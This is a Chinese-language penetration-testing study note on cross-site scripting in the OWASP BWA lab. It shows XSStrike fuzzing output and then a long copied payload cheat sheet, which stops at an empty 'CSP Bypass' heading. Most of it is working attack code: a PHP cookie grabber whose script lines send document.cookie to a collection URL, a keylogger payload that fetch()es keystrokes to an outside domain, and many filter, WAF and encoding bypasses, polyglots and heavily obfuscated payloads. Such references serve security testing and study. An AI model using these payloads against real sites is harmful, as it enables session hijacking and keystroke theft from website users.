• metasploit魔鬼训练营_XSS

    在owaspbwa环境下进行渗透,总结xss:

    ubuntu安装xsstrike模糊测试工具.之支持python3环境。XSStrike_模糊测试

            • Powerful fuzzing engine
            • Context breaking technology
            • Intelligent payload generation
            • GET & POST method support
            • Cookie Support
            • WAF Fingerprinting
            • Handcrafted payloads for filter and WAF evasion
            • Hidden parameter discovery
            • Accurate results via levenshtein distance algorithm
     
    列子:python3 xsstrike.py -u "http://mail.xxx.com/" --params

    [+] Potentially vulnerable objects found

    [+] Heuristics found a potentially valid parameter: ch. Priortizing it.

    [+] Heuristics found a potentially valid parameter: pubid. Priortizing it.

    [+] Heuristics found a potentially valid parameter: passtype. Priortizing it.

    [+] Heuristics found a potentially valid parameter: support_verify_code. Priortizing it.

    [+] Heuristics found a potentially valid parameter: domain. Priortizing it

    尝试使用下面收集到的payload进行模糊测试。

    payloads: 

    # Cross Site Scripting


    Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.


    - [Exploit code or POC](#exploit-code-or-poc)

    - [Identify an XSS endpoint](#identify-an-xss-endpoint)

    - [XSS in HTML/Applications](#xss-in-htmlapplications)

    - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)

    - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)

    - [Polyglot XSS](#polyglot-xss)

    - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)

    - [CSP Bypas](#csp-bypass)

    - [Common WAF Bypas](#common-waf-bypass)


    ## Exploit code or POC


    Cookie grabber for XSS


    ```php

    <?php

    // How to use it

    <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>

    or

    <script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>


    // Write the cookie in a file

    $cookie = $_GET['c'];

    $fp = fopen('cookies.txt', 'a+');

    fwrite($fp, 'Cookie:' .$cookie.' ');

    fclose($fp);


    ?>

    ```


    Keylogger for XSS


    ```javascript

    <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>

    ```


    More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):


    - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)

    - [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)

    - [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)

    - [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)

    - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)

    - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)


    ## Identify an XSS endpoint


    ```javascript

    <script>debugger;</script>

    ```


    ## XSS in HTML/Applications


    XSS Basic


    ```javascript

    Basic payload

    <script>alert('XSS')</script>

    <scr<script>ipt>alert('XSS')</scr<script>ipt>

    "><script>alert('XSS')</script>

    "><script>alert(String.fromCharCode(88,83,83))</script>


    Img payload

    <img src=x onerror=alert('XSS');>

    <img src=x onerror=alert('XSS')//

    <img src=x onerror=alert(String.fromCharCode(88,83,83));>

    <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

    <img src=x:alert(alt) onerror=eval(src) alt=xss>

    "><img src=x onerror=alert('XSS');>

    "><img src=x onerror=alert(String.fromCharCode(88,83,83));>


    Svg payload

    <svg onload=alert(1)>

    <svg/onload=alert('XSS')>

    <svg onload=alert(1)//

    <svg/onload=alert(String.fromCharCode(88,83,83))>

    <svg id=alert(1) onload=eval(id)>

    "><svg/onload=alert(String.fromCharCode(88,83,83))>

    "><svg/onload=alert(/XSS/)

    ```


    XSS for HTML5


    ```javascript

    <body onload=alert(/XSS/.source)>

    <input autofocus onfocus=alert(1)>

    <select autofocus onfocus=alert(1)>

    <textarea autofocus onfocus=alert(1)>

    <keygen autofocus onfocus=alert(1)>

    <video/poster/onerror=alert(1)>

    <video><source onerror="javascript:alert(1)">

    <video src=_ onloadstart="alert(1)">

    <details/open/ontoggle="alert`1`">

    <audio src onloadstart=alert(1)>

    <marquee onstart=alert(1)>

    <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>


    <body ontouchstart=alert(1)> // Triggers when a finger touch the screen

    <body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen

    <body ontouchmove=alert(1)> // When a finger is dragged across the screen.

    ```


    XSS using script tag (external payload)


    ```javascript

    <script src=14.rs>

    you can also specify an arbitratry payload with 14.rs/#payload

    e.g: 14.rs/#alert(document.domain)

    ```


    XSS in META tag


    ```javascript

    Base64 encoded

    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">


    <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>


    With an additional URL

    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

    ```


    XSS in Hidden input


    ```javascript

    <input type="hidden" accesskey="X" onclick="alert(1)">

    Use CTRL+SHIFT+X to trigger the onclick event

    ```


    DOM XSS


    ```javascript

    #"><img src=/ onerror=alert(2)>

    ```


    XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)


    ```javascript

    -(confirm)(document.domain)//

    ; alert(1);//

    ```


    XSS URL


    ```javascript

    URL/<svg onload=alert(1)>

    URL/<script>alert('XSS');//

    URL/<input autofocus onfocus=alert(1)>

    ```


    ## XSS in wrappers javascript and data URI


    XSS with javascript:


    ```javascript

    javascript:prompt(1)


    %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341


    javascript:confirm(1)


    We can encode the "javacript:" in Hex/Octal

    x6Ax61x76x61x73x63x72x69x70x74x3aalert(1)

    u006Au0061u0076u0061u0073u0063u0072u0069u0070u0074u003aalert(1)

    15214116614116314316215116016472alert(1)


    We can use a 'newline character'

    java%0ascript:alert(1) - LF ( )

    java%09script:alert(1) - Horizontal tab ( )

    java%0dscript:alert(1) - CR ( )


    Using the escape character

    javascript:alert(1)


    Using the newline and a comment //

    javascript://%0Aalert(1)

    javascript://anything%0D%0A%0D%0Awindow.alert(1)

    ```


    XSS with data:


    ```javascript

    data:text/html,<script>alert(0)</script>

    data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+

    <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

    ```


    XSS with vbscript: only IE


    ```javascript

    vbscript:msgbox("XSS")

    ```


    ## XSS in files


    ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.


    ```xml

    <name>

    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>

    </name>

    ```


    XSS in XML


    ```xml

    <html>

    <head></head>

    <body>

    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>

    </body>

    </html>

    ```


    XSS in SVG


    ```xml

    <?xml version="1.0" standalone="no"?>

    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">


    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

    <script type="text/javascript">

    alert(document.domain);

    </script>

    </svg>

    ```


    XSS in SVG (short)


    ```javascript

    <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>


    <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>

    <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>

    <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

    ```


    XSS in Markdown


    ```csharp

    [a](javascript:prompt(document.cookie))

    [a](j a v a s c r i p t:prompt(document.cookie))

    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

    [a](javascript:window.onerror=alert;throw%201)

    ```


    XSS in SWF flash application


    ```powershell

    Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

    IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}

    IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

    ```


    more payloads in ./files


    XSS in SWF flash application


    ```

    flashmediaelement.swf?jsinitfunctio%gn=alert`1`

    flashmediaelement.swf?jsinitfunctio%25gn=alert(1)

    ZeroClipboard.swf?id="))} catch(e) {alert(1);}//&width=1000&height=1000

    swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//

    swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf

    plupload.flash.swf?%#target%g=alert&uid%g=XSS&

    moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true

    video-js.swf?readyFunction=alert(1)

    player.swf?playerready=alert(document.cookie)

    player.swf?tracecall=alert(document.cookie)

    banner.swf?clickTAG=javascript:alert(1);//

    io.swf?yid="));}catch(e){alert(1);}//

    video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29

    bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4

    flashcanvas.swf?id=test"));}catch(e){alert(document.domain)}//

    phpmyadmin/js/canvg/flashcanvas.swf?id=test”));}catch(e){alert(document.domain)}//

    ```


    XSS in CSS


    ```html

    <!DOCTYPE html>

    <html>

    <head>

    <style>

    div {

    background-image: url("data:image/jpg;base64,</style><svg/onload=alert(document.domain)>");

    background-color: #cccccc;

    }

    </style>

    </head>

    <body>

    <div>lol</div>

    </body>

    </html>

    ```


    ## Polyglot XSS


    Polyglot XSS - 0xsobky


    ```javascript

    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

    ```


    Polyglot XSS - Ashar Javed


    ```javascript

    ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext></|><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

    ```


    Polyglot XSS - Mathias Karlsson


    ```javascript

    " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

    ```


    Polyglot XSS - Rsnake


    ```javascript

    ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

    ```


    Polyglot XSS - Daniel Miessler


    ```javascript

    javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

    javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

    javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

    javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

    javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

    javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

    javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

    --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

    /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

    javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

    /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

    ```


    Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)

    ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)


    ```javascript

    -->'"/></sCript><svG x=">" onload=(cou006efirm)``>

    ```


    ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)


    ```javascript

    <svg%0Ao%00nload=%09((prou006dpt))()//

    ```


    Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml)


    ```javascript

    # by crlf

    javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=alert()//>


    # by europa

    javascript:"/*'/*`/*" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>


    # by EdOverflow

    javascript:"/*"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>


    # by h1/ragnar

    javascript:`//"//"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`

    ```


    ## Filter Bypass and exotic payloads


    Bypass case sensitive


    ```javascript

    <sCrIpt>alert(1)</ScRipt>

    ```


    Bypass tag blacklist


    ```javascript

    <script x>

    <script x>alert('XSS')<script y>

    ```


    Bypass word blacklist with code evaluation


    ```javascript

    eval('ale'+'rt(0)');

    Function("ale"+"rt(1)")();

    new Function`alert\`6\``;

    setTimeout('ale'+'rt(2)');

    setInterval('ale'+'rt(10)');

    Set.constructor('ale'+'rt(13)')();

    Set.constructor`alx65rtx2814x29```;

    ```


    Bypass with incomplete html tag - IE/Firefox/Chrome/Safari


    ```javascript

    <img src='1' onerror='alert(0)' <

    ```


    Bypass quotes for string


    ```javascript

    String.fromCharCode(88,83,83)

    ```


    Bypass quotes in script tag


    ```javascript

    http://localhost/bla.php?test=</script><script>alert(1)</script>

    <html>

    <script>

    <?php echo 'foo="text '.$_GET['test'].'";';`?>

    </script>

    </html>

    ```


    Bypass quotes in mousedown event


    ```javascript

    <a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>


    You can bypass a single quote with ' in an on mousedown event handler

    ```


    Bypass dot filter


    ```javascript

    <script>window['alert'](document['domain'])<script>

    ```


    Bypass parenthesis for string - Firefox/Opera


    ```javascript

    alert`1`

    setTimeout`alertu0028document.domainu0029`;

    ```


    Bypass onxxxx= blacklist


    ```javascript

    <object onafterscriptexecute=confirm(0)>

    <object onbeforescriptexecute=confirm(0)>

    ```


    Bypass onxxx= filter with a null byte/vertical tab - IE/Safari


    ```javascript

    <img src='1' onerrorx00=alert(0) />

    <img src='1' onerrorx0b=alert(0) />

    ```


    Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari


    ```javascript

    <img src='1' onerror/=alert(0) />

    ```


    Bypass space filter with "/" - IE/Firefox/Chrome/Safari


    ```javascript

    <img/src='1'/onerror=alert(0)>

    ```


    Bypass space filter with 0x0c/^L


    ```javascript

    <svg onload = alert(1) >



    $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd

    00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al

    00000010: 6572 7428 3129 0c3e 0a ert(1).>.

    ```


    Bypass document blacklist


    ```javascript

    <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>

    ```


    Bypass using javascript inside a string


    ```javascript

    <script>

    foo="text </script><script>alert(1)</script>";

    </script>

    ```


    Bypass using an alternate way to redirect


    ```javascript

    location="http://google.com"

    document.location = "http://google.com"

    document.location.href="http://google.com"

    window.location.assign("http://google.com")

    window['location']['href']="http://google.com"

    ```


    Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)


    ```javascript

    window['alert'](0)

    parent['alert'](1)

    self['alert'](2)

    top['alert'](3)

    this['alert'](4)

    frames['alert'](5)

    content['alert'](6)


    [7].map(alert)

    [8].find(alert)

    [9].every(alert)

    [10].filter(alert)

    [11].findIndex(alert)

    [12].forEach(alert);

    ```


    Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)


    ```javascript

    eval('ale'+'rt(0)');

    Function("ale"+"rt(1)")();

    new Function`alert\`6\``;


    constructor.constructor("aler"+"t(3)")();

    [].filter.constructor('ale'+'rt(4)')();


    top["al"+"ert"](5);

    top[8680439..toString(30)](7);

    top[/al/.source+/ert/.source](8);

    top['alx65rt'](9);


    open('java'+'script:ale'+'rt(11)');

    location='javascript:ale'+'rt(12)';


    setTimeout`alertu0028document.domainu0029`;

    setTimeout('ale'+'rt(2)');

    setInterval('ale'+'rt(10)');

    Set.constructor('ale'+'rt(13)')();

    Set.constructor`alx65rtx2814x29```;

    ```


    Bypass using an alternate way to trigger an alert


    ```javascript

    var i = document.createElement("iframe");

    i.onload = function(){

    i.contentWindow.alert(1);

    }

    document.appendChild(i);


    // Bypassed security

    XSSObject.proxy = function (obj, name, report_function_name, exec_original) {

    var proxy = obj[name];

    obj[name] = function () {

    if (exec_original) {

    return proxy.apply(this, arguments);

    }

    };

    XSSObject.lockdown(obj, name);

    };

    XSSObject.proxy(window, 'alert', 'window.alert', false);

    ```


    Bypass ">" using nothing #trololo (you don't need to close your tags)


    ```javascript

    <svg onload=alert(1)//

    ```


    Bypass ';' using another character


    ```javascript

    'te' * alert('*') * 'xt';

    'te' / alert('/') / 'xt';

    'te' % alert('%') % 'xt';

    'te' - alert('-') - 'xt';

    'te' + alert('+') + 'xt';

    'te' ^ alert('^') ^ 'xt';

    'te' > alert('>') > 'xt';

    'te' < alert('<') < 'xt';

    'te' == alert('==') == 'xt';

    'te' & alert('&') & 'xt';

    'te' , alert(',') , 'xt';

    'te' | alert('|') | 'xt';

    'te' ? alert('ifelsesh') : 'xt';

    'te' in alert('in') in 'xt';

    'te' instanceof alert('instanceof') instanceof 'xt';

    ```


    Bypass using HTML encoding


    ```javascript

    %26%2397;lert(1)

    ```


    Bypass using [Katakana](https://github.com/aemkei/katakana.js)


    ```javascript

    javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

    ```


    Bypass using Octal encoding


    ```javascript

    javascript:'74163166147401571561541571411447514115414516216450615176'

    ```


    Bypass using Unicode


    ```javascript

    Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was

    transformed into U+003C LESS­THAN SIGN (<)


    Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was

    transformed into U+0022 QUOTATION MARK (")


    Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was

    transformed into U+0027 APOSTROPHE (')


    Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was

    transformed into U+003C LESS­THAN SIGN (<)


    Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was

    transformed into U+0022 QUOTATION MARK (")


    Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was

    transformed into U+0027 APOSTROPHE (')


    E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/

    %EF%BC%9E becomes >

    %EF%BC%9C becomes <

    ```


    Bypass using Unicode converted to uppercase


    ```javascript

    İ (%c4%b0).toLowerCase() => i

    ı (%c4%b1).toUpperCase() => I

    ſ (%c5%bf) .toUpperCase() => S

    K (%E2%84%AA).toLowerCase() => k


    <ſvg onload=... > become <SVG ONLOAD=...>

    <ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>

    ```


    Bypass using overlong UTF-8


    ```javascript

    < = %C0%BC = %E0%80%BC = %F0%80%80%BC

    > = %C0%BE = %E0%80%BE = %F0%80%80%BE

    ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7

    " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2

    " = %CA%BA

    ' = %CA%B9

    ```


    Bypass using UTF-7


    ```javascript

    +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

    ```


    Bypass using UTF-16be


    ```javascript

    %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00

    x00<x00sx00vx00gx00/x00ox00nx00lx00ox00ax00dx00=x00ax00lx00ex00rx00tx00(x00)x00>

    ```


    Bypass using UTF-32


    ```js

    %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

    ```


    Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)

    BOM character allows you to override charset of the page


    ```js

    BOM Character for UTF-16 Encoding:

    Big Endian : 0xFE 0xFF

    Little Endian : 0xFF 0xFE

    XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E


    BOM Character for UTF-32 Encoding:

    Big Endian : 0x00 0x00 0xFE 0xFF

    Little Endian : 0xFF 0xFE 0x00 0x00

    XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

    ```



    Bypass using weird encoding or native interpretation to hide the payload (alert())


    ```javascript

    <script>u0061u006Cu0065u0072u0074(1)</script>

    <img src="1" onerror="alert(1)" />

    <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

    <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")())();</script>

    <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

    ```


    Exotic payloads


    ```javascript

    <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

    <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>

    <script>$=1,alert($)</script>

    <script ~~~>confirm(1)</script ~~~>

    <script>$=1,u0061lert($)</script>

    <</script/script><script>eval('\u'+'0061'+'lert(1)')//</script>

    <</script/script><script ~~~>u0061lert(1)</script ~~~>

    </style></scRipt><scRipt>alert(1)</scRipt>

    <img/id="alert&lpar;'XSS')"/alt="/"src="/"onerror=eval(id)>

    <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

    <svg><x><script>alert('1')</x>

    <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>

    ```


    ## CSP Bypass


